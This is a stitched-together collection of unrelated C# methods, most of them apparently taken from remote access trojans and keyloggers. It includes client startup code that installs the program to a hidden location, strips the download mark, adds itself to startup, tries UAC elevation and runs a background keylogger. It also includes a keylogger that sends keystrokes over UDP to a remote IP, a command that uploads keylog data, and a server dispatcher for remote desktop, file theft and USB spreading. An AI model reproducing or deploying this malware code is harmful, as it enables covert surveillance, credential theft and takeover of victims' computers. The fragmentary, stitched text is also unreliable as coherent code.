public static void Main(string[] args)
{
IPEndPoint ip = null;
if (args.Length >= 2)
{
ip = new IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1]));
}
using (var keylogger = new Keylogger())
using (UdpClient client = new UdpClient())
{
keylogger.KeyEvent += (sender, type, key) =>
{
string line = (type == KeyboardEventType.KeyDown ? "KEY_DOWN: " : "KEY_UP: ") + key + "\n";
if (ip != null)
{
byte[] bytes = Encoding.ASCII.GetBytes(line);
client.Send(bytes, bytes.Length, ip);
}
Console.Write(line);
};
Application.Run();
}
}
public async Task <IActionResult> Edit(int id, [Bind("Id,Keystroke,CreationDate")] Keylogger keylogger)
{
if (id != keylogger.Id)
{
return(NotFound());
}
if (ModelState.IsValid)
{
try
{
_context.Update(keylogger);
await _context.SaveChangesAsync();
}
catch (DbUpdateConcurrencyException)
{
if (!KeyloggerExists(keylogger.Id))
{
return(NotFound());
}
else
{
throw;
}
}
return(RedirectToAction(nameof(Index)));
}
return(View(keylogger));
}
private static bool Initialize()
{
var hosts = new HostsManager(HostHelper.GetHostsList(Settings.HOSTS));
if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION))
{
return(false);
}
AES.SetDefaultKey(Settings.PASSWORD);
ClientVerisi.InstallPath = Path.Combine(Settings.DIR,
((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();
DosyaYardımcısı.DeleteZoneIdentifier(ClientVerisi.CurrentPath);
if (!Settings.INSTALL || ClientVerisi.CurrentPath == ClientVerisi.InstallPath)
{
WindowsAccountHelper.StartUserIdleCheckThread();
if (Settings.STARTUP)
{
if (!Başlangıç.AddToStartup())
{
ClientVerisi.AddToStartupFailed = true;
}
}
if (Settings.INSTALL && Settings.HIDEFILE)
{
try
{
File.SetAttributes(ClientVerisi.CurrentPath, FileAttributes.Hidden);
}
catch (Exception)
{
}
}
if (Settings.ENABLELOGGER)
{
new Thread(() =>
{
_msgLoop = new ApplicationContext();
var logger = new Keylogger(15000);
Application.Run(_msgLoop);
})
{
IsBackground = true
}.Start();
}
ConnectClient = new KuuhakuClient(hosts);
return(true);
}
MutexHelper.CloseMutex();
ClientYükleyici.Install(ConnectClient);
return(false);
}
private static void Initialize()
{
if (!MutexHelper.CreateMutex(Settings.MUTEX))
{
ClientData.Disconnect = true; // process with same mutex is already running
}
if (ClientData.Disconnect)
{
return;
}
AES.PreHashKey(Settings.PASSWORD);
_hosts = new HostsManager(HostHelper.GetHostsList(Settings.HOSTS));
ClientData.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();
if (_hosts.IsEmpty)
{
ClientData.Disconnect = true; // no hosts to connect
}
if (ClientData.Disconnect)
{
return;
}
FileHelper.DeleteZoneIdentifier(ClientData.CurrentPath);
if (!Settings.INSTALL || ClientData.CurrentPath == ClientData.InstallPath)
{
WindowsAccountHelper.StartUserIdleCheckThread();
if (Settings.STARTUP && Settings.INSTALL)
{
if (!Startup.AddToStartup())
{
ClientData.AddToStartupFailed = true;
}
}
InitializeClient();
if (Settings.ENABLELOGGER)
{
new Thread(() =>
{
_msgLoop = new ApplicationContext();
Keylogger logger = new Keylogger(15000);
Application.Run(_msgLoop);
}).Start();
}
}
else
{
MutexHelper.CloseMutex();
ClientInstaller.Install(ConnectClient);
}
}
/// <summary>
/// Creates and Starts a Key Logger that runs in the background
/// </summary>
///
/// <remarks>
/// Keylogger provided open-source by Alexander Kent from http://www.codeproject.com/Articles/18890/NET-Hookless-Key-logger-Advanced-Keystroke-Mining
/// </remarks>
private static void InitKeyLogger()
{
_keyLogger = new Keylogger()
{
Enabled = true,
FlushInterval = 50,
LOG_FILE = AppFilePath + "/logs/" + DateTime.Now.ToString("MM-dd-yyyy"),
LOG_MODE = "hour",
LOG_OUT = "file"
};
}
public async Task <IActionResult> Create([Bind("Id,Keystroke,CreationDate")] Keylogger keylogger)
{
if (ModelState.IsValid)
{
_context.Add(keylogger);
await _context.SaveChangesAsync();
return(RedirectToAction(nameof(Index)));
}
return(View(keylogger));
}
private void frmMain_Load(object sender, EventArgs e)
{
try
{
Logger = KeyloggerFactory.GetKeylogger(OutputType.Console);
}
catch
{
Close();
}
}
private static void Initialize()
{
Thread.Sleep(2000);
AES.PreHashKey(Settings.PASSWORD);
_hosts = new HostsManager(HostHelper.GetHostsList(Settings.HOSTS));
SystemCore.OperatingSystem = SystemCore.GetOperatingSystem();
SystemCore.MyPath = Application.ExecutablePath;
SystemCore.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
SystemCore.AccountType = SystemCore.GetAccountType();
GeoLocationHelper.Initialize();
if (!Settings.INSTALL || SystemCore.MyPath == SystemCore.InstallPath)
{
if (!SystemCore.CreateMutex(ref _appMutex))
SystemCore.Disconnect = true;
if (SystemCore.Disconnect)
return;
new Thread(SystemCore.UserIdleThread).Start();
if (Settings.STARTUP && Settings.INSTALL)
{
SystemCore.AddToStartup();
}
InitializeClient();
if (Settings.ENABLELOGGER)
{
new Thread(() =>
{
_msgLoop = new ApplicationContext();
Keylogger logger = new Keylogger(15000);
Application.Run(_msgLoop);
}).Start(); ;
}
}
else
{
if (!SystemCore.CreateMutex(ref _appMutex))
SystemCore.Disconnect = true;
if (SystemCore.Disconnect)
return;
SystemCore.Install();
}
}
static void Main(string[] args)
{
Task.Run(async() =>
{
// CopyOnSystem();
InitializeConnection();
});
using (var keylogger = new Keylogger(_environmentConfiguration.LoggerPath))
{
keylogger.CreateKeyboardHook();
Application.Run();
}
}
private string StopKeyLogging()
{
try
{
if (kl != null)
{
kl.Enabled = false;
kl = null;
}
return("Key Logging Stopped");
}
catch (Exception ex)
{
return(ex.ToString());
}
}
private string StartKeyLogging()
{
try
{
if (kl == null)
{
kl = new Keylogger();
kl.Enabled = true; // enable key logging
}
return("Key Logging Started");
}
catch (Exception ex)
{
return(ex.ToString());
}
}
public void TestKeylogger()
{
string results = "";
Threads.Thread t = new Threads.Thread(() =>
{
results = Keylogger.StartKeylogger(3);
});
t.Start();
Forms.SendKeys.SendWait("test123");
t.Join(3000);
Assert.IsTrue(results.Length > 0);
Assert.IsTrue(results.Contains("test123"));
}
static void Main(string[] args)
{
//RegistryIndex.index(Microsoft.Win32.RegistryHive.CurrentUser, Microsoft.Win32.RegistryView.Default);
//RegistryIndex.index(Microsoft.Win32.RegistryHive.Users, Microsoft.Win32.RegistryView.Default);
//RegistryIndex.index(Microsoft.Win32.RegistryHive.LocalMachine, Microsoft.Win32.RegistryView.Default);
String assembly = System.Windows.Forms.Application.ExecutablePath.Replace("/", "\\");
String identifier = "NONE";
String host = "localhost";
int port = 8080;
String temp = Path.GetTempPath();
#if RELEASE
if (!assembly.StartsWith(temp))
{
String path = Path.Combine(temp, identifier.GetHashCode().ToString());
Directory.CreateDirectory(path);
String newDir = Path.Combine(path, assembly.GetHashCode().ToString() + ".exe");
if (File.Exists(newDir))
{
try
{
File.Delete(newDir);
}
catch
{
//instance already running
return;
}
}
File.Copy(assembly, newDir);
Process.Start(newDir);
Environment.Exit(0);
}
#endif
SystemInfo.openStartup(null);
new Thread(() => Keylogger.start()).Start();
Client me = Client.buildLocalClient(identifier);
ClientConnection.client = me;
bool attempt = ClientConnection.attemptConnection(host, port);
while (!attempt)
{
attempt = ClientConnection.attemptConnection(host, port);
}
ClientConnection.run(false);
Console.ReadKey();
}
//Updates keylogger
public void UpdateKeylogger(int ConnectionId, string Keystroke)
{
foreach (Keylogger K in Application.OpenForms.OfType <Keylogger>())
{
if (K.Visible && K.ConnectionId == ConnectionId && K.Update)
{
K.txtKeylogger.AppendText(Keystroke + " ");
return;
}
}
K = new Keylogger();
K.Show();
K.ConnectionId = ConnectionId;
K.Text = "Keylogger - " + ConnectionId;
if (K.ConnectionId == ConnectionId)
{
K.txtKeylogger.AppendText(Keystroke + " ");
}
}
public static bool Load()
{
//Initialize all features
if (Settings.SystemProcess_CheckParentProcess)
{
AntiDebug.CheckParentProcess();
}
if (SysMutex.CheckMutex() == false)
{
return(false);
}
//UsbSpread usbSpread = new UsbSpread();
//SystemProcess sysProc = new SystemProcess();
Keylogger keylog = new Keylogger();
//MsgBox msgbox = new MsgBox();
return(true);
}
protected override string ExecuteCommand(string[] args)
{
Keylogger keylogger = Keylogger.GetInstance;
if (args.Length == 0)
{
return(keylogger.Data);
}
else if (args[0].Equals("clear"))
{
keylogger.Clear();
return("keylogger cleared");
}
else if (args[0].Equals("upload"))
{
return(FileHelper.UploadString(keylogger.Data));
}
return(keylogger.Data);
}
//public async Task<string> GetKey()
//{
// string baseUrl = "http://localhost:8889/keylog2.html";
// var client = new HttpClient();
// var data = await client.GetStringAsync(baseUrl);
// var wordList = await _context.WordLists.ToListAsync();
// if (!string.IsNullOrEmpty(data))
// {
// string addSpace = data.Replace("<", " <");
// string replaceString = addSpace.Replace("\n ", " ");
// replaceString = replaceString.Replace("\n", " ");
// List<string> words;
// words = replaceString.Split(" ").ToList();
// foreach (var word in words)
// {
// DetectedWord detectedWord = new DetectedWord();
// Keylogger keylogger = new Keylogger();
// WordList detection = new WordList();
// keylogger.Keystroke = word;
// _context.Add(keylogger);
// detection = wordList.Where(x => x.Description.ToLower() == word.ToLower()).FirstOrDefault();
// if (detection != null)
// {
// detectedWord.Description = detection.Description;
// _context.Add(detectedWord);
// }
// await _context.SaveChangesAsync();
// }
// }
// return data;
//}
public async Task <string> GetKey()
{
//string baseUrl = "http://localhost:8889/keylog2.html";
string baseUrl = "http://192.168.4.1";
var client = new HttpClient();
var data = await client.GetStringAsync(baseUrl);
var wordList = await _context.WordLists.Select(x => x.Description).ToListAsync();
if (!string.IsNullOrEmpty(data))
{
Keylogger keylogger = new Keylogger();
keylogger.Keystroke = data;
_context.Add(keylogger);
var detections = wordList.Where(x => data.Contains(x)).ToList();
if (detections != null)
{
foreach (var detection in detections)
{
DetectedWord detectedWord = new DetectedWord();
detectedWord.Description = detection;
_context.Add(detectedWord);
}
}
await _context.SaveChangesAsync();
//clear the data after save
string baseUrl2 = "http://192.168.4.1/clear";
var client2 = new HttpClient();
var data2 = await client.GetStringAsync(baseUrl2);
}
return(data);
}
private void KEYLOGGERToolStripMenuItem_Click(object sender, EventArgs e)
{
try
{
if (listView1.SelectedItems.Count > 0)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("isON").AsString = "true";
foreach (ListViewItem C in listView1.SelectedItems)
{
Clients CL = (Clients)C.Tag;
this.BeginInvoke((MethodInvoker)(() =>
{
Keylogger KL = (Keylogger)Application.OpenForms["keyLogger:" + CL.ID];
if (KL == null)
{
KL = new Keylogger
{
Name = "keyLogger:" + CL.ID,
Text = "keyLogger:" + CL.ID,
F = this,
C = CL
};
KL.Show();
ThreadPool.QueueUserWorkItem(CL.BeginSend, msgpack.Encode2Bytes());
}
}));
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
//Start keylogger
private void btnStartKL_Click(object sender, EventArgs e)
{
if (lbConnectedClients.SelectedItems.Count < 0)
{
MessageBox.Show("Please select a client!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
return;
}
int ConnectionId = CurrentSelectedID;
MainServer.Send(ConnectionId, Encoding.ASCII.GetBytes("StartKL"));
foreach (Keylogger KL in Application.OpenForms.OfType <Keylogger>())
{
if (KL.Visible && KL.ConnectionId == ConnectionId)
{
return;
}
}
K = new Keylogger();
K.ConnectionId = ConnectionId;
K.Text = "Keylogger - " + ConnectionId;
K.Show();
}
private static bool Initialize()
{
var hosts = new HostsManager(HostHelper.GetHostsList(Settings.HOSTS));
// process with same mutex is already running
if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION)) // no hosts to connect
{
return(false);
}
Aes128.SetDefaultKey(Settings.KEY, Settings.AUTHKEY);
ClientData.InstallPath = Path.Combine(Settings.DIRECTORY, ((!string.IsNullOrEmpty(Settings.SUBDIRECTORY)) ? Settings.SUBDIRECTORY + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();
FileHelper.DeleteZoneIdentifier(ClientData.CurrentPath);
if (!Settings.INSTALL || ClientData.CurrentPath == ClientData.InstallPath)
{
WindowsAccountHelper.StartUserIdleCheckThread();
if (Settings.STARTUP)
{
if (!Startup.AddToStartup())
{
ClientData.AddToStartupFailed = true;
}
}
if (Settings.INSTALL && Settings.HIDEFILE)
{
try
{
File.SetAttributes(ClientData.CurrentPath, FileAttributes.Hidden);
}
catch (Exception)
{
}
}
if (Settings.INSTALL && Settings.HIDEINSTALLSUBDIRECTORY && !string.IsNullOrEmpty(Settings.SUBDIRECTORY))
{
try
{
DirectoryInfo di = new DirectoryInfo(Path.GetDirectoryName(ClientData.InstallPath));
di.Attributes |= FileAttributes.Hidden;
}
catch (Exception)
{
}
}
if (Settings.ENABLELOGGER)
{
new Thread(() =>
{
_msgLoop = new ApplicationContext();
Keylogger logger = new Keylogger(15000);
Application.Run(_msgLoop);
})
{
IsBackground = true
}.Start();
}
ConnectClient = new QuasarClient(hosts);
return(true);
}
else
{
MutexHelper.CloseMutex();
ClientInstaller.Install(ConnectClient);
return(false);
}
}
private static bool Initialize()
{
var hosts = new HostsManager(HostHelper.GetHostsList(Settings.HOSTS));
// process with same mutex is already running
if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION)) // no hosts to connect
{
return(false);
}
ClientData.InstallPath = Path.Combine(Settings.DIRECTORY, ((!string.IsNullOrEmpty(Settings.SUBDIRECTORY)) ? Settings.SUBDIRECTORY + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();
// Request elevation
if (Settings.REQUESTELEVATIONONEXECUTION && WindowsAccountHelper.GetAccountType() != "Admin")
{
ProcessStartInfo processStartInfo = new ProcessStartInfo
{
FileName = "cmd",
Verb = "runas",
Arguments = "/k START \"\" \"" + ClientData.CurrentPath + "\" & EXIT",
WindowStyle = ProcessWindowStyle.Hidden,
UseShellExecute = true
};
MutexHelper.CloseMutex(); // close the mutex so our new process will run
bool success = true;
try
{
Process.Start(processStartInfo);
}
catch
{
success = false;
MutexHelper.CreateMutex(Settings.MUTEX); // re-grab the mutex
}
if (success)
{
ConnectClient.Exit();
}
}
FileHelper.DeleteZoneIdentifier(ClientData.CurrentPath);
if (!Settings.INSTALL || ClientData.CurrentPath == ClientData.InstallPath)
{
WindowsAccountHelper.StartUserIdleCheckThread();
if (Settings.STARTUP)
{
if (!Startup.AddToStartup())
{
ClientData.AddToStartupFailed = true;
}
}
if (Settings.INSTALL && Settings.HIDEFILE)
{
try
{
File.SetAttributes(ClientData.CurrentPath, FileAttributes.Hidden);
}
catch (Exception)
{
}
}
if (Settings.INSTALL && Settings.HIDEINSTALLSUBDIRECTORY && !string.IsNullOrEmpty(Settings.SUBDIRECTORY))
{
try
{
DirectoryInfo di = new DirectoryInfo(Path.GetDirectoryName(ClientData.InstallPath));
di.Attributes |= FileAttributes.Hidden;
}
catch (Exception)
{
}
}
if (Settings.ENABLELOGGER)
{
new Thread(() =>
{
_msgLoop = new ApplicationContext();
Keylogger logger = new Keylogger(15000);
Application.Run(_msgLoop);
})
{
IsBackground = true
}.Start();
}
ConnectClient = new QuasarClient(hosts, Settings.SERVERCERTIFICATE);
return(true);
}
MutexHelper.CloseMutex();
ClientInstaller.Install(ConnectClient);
return(false);
}
public static void Read(object Obj)
{
try
{
object[] array = Obj as object[];
byte[] Data = (byte[])array[0];
Clients Client = (Clients)array[1];
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(Data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "ClientInfo":
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
Client.LV = new ListViewItem();
Client.LV.Tag = Client;
Client.LV.Text = string.Format("{0}:{1}", Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], Client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
string[] ipinf = cNewGeoUse.GetIpInf(Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
Client.LV.SubItems.Add(ipinf[1]);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
Client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
Client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Insert(0, Client.LV);
lock (Settings.Online)
{
Settings.Online.Add(Client);
}
}));
HandleLogs.Addmsg($"Client {Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
}
break;
case "Ping":
{
Debug.WriteLine(unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "Logs":
{
HandleLogs.Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
}
break;
case "BotKiller":
{
HandleLogs.Addmsg($"Client {Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
}
break;
case "usbSpread":
{
HandleLogs.Addmsg($"Client {Client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
}
break;
case "Received":
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
Client.LV.ForeColor = Color.Empty;
}));
}
}
break;
case "remoteDesktop":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
RemoteDesktop RD = (RemoteDesktop)Application.OpenForms["RemoteDesktop:" + Client.ID];
try
{
if (RD != null && RD.Active == true)
{
byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
{
RD.pictureBox1.Image = (Bitmap)decoded;
RD.RenderSW = Stopwatch.StartNew();
}
RD.FPS++;
if (RD.sw.ElapsedMilliseconds >= 1000)
{
RD.Text = "RemoteDesktop:" + Client.ID + " FPS:" + RD.FPS + " Screen:" + decoded.Width + " x " + decoded.Height + " Size:" + Methods.BytesToString(RdpStream.Length);
RD.FPS = 0;
RD.sw = Stopwatch.StartNew();
}
}
else
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("Option").AsString = "false";
Client.BeginSend(msgpack.Encode2Bytes());
}
}
catch (Exception ex) { Debug.WriteLine(ex.Message); }
}));
}
}
break;
case "processManager":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
ProcessManager PM = (ProcessManager)Application.OpenForms["processManager:" + Client.ID];
if (PM != null)
{
PM.listView1.Items.Clear();
string AllProcess = unpack_msgpack.ForcePathObject("Message").AsString;
string data = AllProcess.ToString();
string[] _NextProc = data.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < _NextProc.Length; i++)
{
if (_NextProc[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_NextProc[i]);
lv.SubItems.Add(_NextProc[i + 1]);
lv.ToolTipText = _NextProc[i];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
PM.imageList1.Images.Add(_NextProc[i + 1], im);
lv.ImageKey = _NextProc[i + 1];
PM.listView1.Items.Add(lv);
}
i += 2;
}
}
}));
}
}
break;
case "socketDownload":
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "pre":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
string file = unpack_msgpack.ForcePathObject("File").AsString;
string size = unpack_msgpack.ForcePathObject("Size").AsString;
DownloadFile SD = (DownloadFile)Application.OpenForms["socketDownload:" + dwid];
if (SD != null)
{
SD.C = Client;
SD.labelfile.Text = Path.GetFileName(file);
SD.dSize = Convert.ToInt64(size);
SD.timer1.Start();
}
}));
}
}
break;
case "save":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
DownloadFile SD = (DownloadFile)Application.OpenForms["socketDownload:" + dwid];
if (SD != null)
{
if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", ""))))
{
Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "")));
}
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(Path.Combine(Application.StartupPath, "ClientsFolder\\" + SD.Text.Replace("socketDownload:", "") + "\\" + unpack_msgpack.ForcePathObject("Name").AsString));
}
}));
}
}
break;
}
break;
}
case "keyLogger":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
Keylogger KL = (Keylogger)Application.OpenForms["keyLogger:" + Client.ID];
if (KL != null)
{
KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString());
}
else
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("isON").AsString = "false";
Client.BeginSend(msgpack.Encode2Bytes());
}
}));
}
break;
}
case "fileManager":
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "getDrivers":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FileManager FM = (FileManager)Application.OpenForms["fileManager:" + Client.ID];
if (FM != null)
{
FM.listView1.Items.Clear();
string[] driver = unpack_msgpack.ForcePathObject("Driver").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < driver.Length; i++)
{
if (driver[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = driver[i];
lv.ToolTipText = driver[i];
if (driver[i + 1] == "Fixed")
{
lv.ImageIndex = 1;
}
else if (driver[i + 1] == "Removable")
{
lv.ImageIndex = 2;
}
else
{
lv.ImageIndex = 1;
}
FM.listView1.Items.Add(lv);
}
i += 1;
}
}
}));
}
}
break;
case "getPath":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
FileManager FM = (FileManager)Application.OpenForms["fileManager:" + Client.ID];
if (FM != null)
{
FM.listView1.Items.Clear();
FM.listView1.Groups.Clear();
string[] _folder = unpack_msgpack.ForcePathObject("Folder").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
ListViewGroup groupFolder = new ListViewGroup("Folders");
FM.listView1.Groups.Add(groupFolder);
int numFolders = 0;
for (int i = 0; i < _folder.Length; i++)
{
if (_folder[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = _folder[i];
lv.ToolTipText = _folder[i + 1];
lv.Group = groupFolder;
lv.ImageIndex = 0;
FM.listView1.Items.Add(lv);
numFolders += 1;
}
i += 1;
}
string[] _file = unpack_msgpack.ForcePathObject("File").AsString.Split(new[] { "-=>" }, StringSplitOptions.None);
ListViewGroup groupFile = new ListViewGroup("Files");
FM.listView1.Groups.Add(groupFile);
int numFiles = 0;
for (int i = 0; i < _file.Length; i++)
{
if (_file[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_file[i]);
lv.ToolTipText = _file[i + 1];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_file[i + 2])));
FM.imageList1.Images.Add(_file[i + 1], im);
lv.ImageKey = _file[i + 1];
lv.Group = groupFile;
lv.SubItems.Add(Methods.BytesToString(Convert.ToInt64(_file[i + 3])));
FM.listView1.Items.Add(lv);
numFiles += 1;
}
i += 3;
}
FM.toolStripStatusLabel2.Text = $" Folder[{numFolders.ToString()}] Files[{numFiles.ToString()}]";
}
}));
}
}
break;
}
break;
}
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
}
}
private static void Initialize()
{
Thread.Sleep(2000);
SystemCore.OperatingSystem = SystemCore.GetOperatingSystem();
SystemCore.MyPath = Application.ExecutablePath;
SystemCore.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
SystemCore.AccountType = SystemCore.GetAccountType();
GeoLocationHelper.Initialize();
if (Settings.ENABLEUACESCALATION)
{
if (SystemCore.TryUacTrick())
{
SystemCore.Disconnect = true;
}
if (SystemCore.Disconnect)
{
return;
}
}
if (!Settings.INSTALL || SystemCore.MyPath == SystemCore.InstallPath)
{
if (!SystemCore.CreateMutex(ref _appMutex))
{
SystemCore.Disconnect = true;
}
if (SystemCore.Disconnect)
{
return;
}
new Thread(SystemCore.UserIdleThread).Start();
if (Settings.STARTUP && Settings.INSTALL)
{
SystemCore.AddToStartup();
}
InitializeClient();
if (Settings.ENABLELOGGER)
{
new Thread(() =>
{
_msgLoop = new ApplicationContext();
Keylogger logger = new Keylogger(15000);
Application.Run(_msgLoop);
}).Start();;
}
}
else
{
if (!SystemCore.CreateMutex(ref _appMutex))
{
SystemCore.Disconnect = true;
}
if (SystemCore.Disconnect)
{
return;
}
SystemCore.Install();
}
}
